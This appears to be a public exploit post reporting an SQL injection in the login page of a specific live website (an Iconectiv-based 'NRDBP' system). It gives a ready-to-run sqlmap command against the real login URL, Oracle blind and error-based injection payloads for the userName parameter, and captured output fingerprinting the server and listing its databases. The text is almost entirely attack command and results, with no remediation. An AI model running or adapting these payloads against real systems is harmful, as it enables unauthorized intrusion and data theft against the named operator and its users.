# Exploit Title: (EAP 6) NRDBP - Login Iconectiv Version 3.2.0.6 | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "https://www.nrdbp.gr/NrdbpWeb/login.do" --forms --current-db --dbs --banner --batch
---------------------------------------------------------------------------------------------------
NRDBP - Login
(EAP 6)
Iconectiv
Version 3.2.0.6
https://www.nrdbp.gr/NrdbpWeb/login.do
---
Parameter: userName (POST)
Type: boolean-based blind
Title: Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
Payload: userName=RopA' AND (SELECT (CASE WHEN (1251=1251) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,1251) END) FROM DUAL) IS NULL-- nLLF&password=&submit=Login&face=kpDr&systemTime=20:56:19
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: userName=RopA' AND 8689=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(118)||CHR(112)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (8689=8689) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))-- DUzD&password=&submit=Login&face=kpDr&systemTime=20:56:19
---
the back-end DBMS is Oracle
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: JSP 2.2, Apache 2.2.15
back-end DBMS: Oracle
banner: 'Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production'
available databases [18]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] NRDBP
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB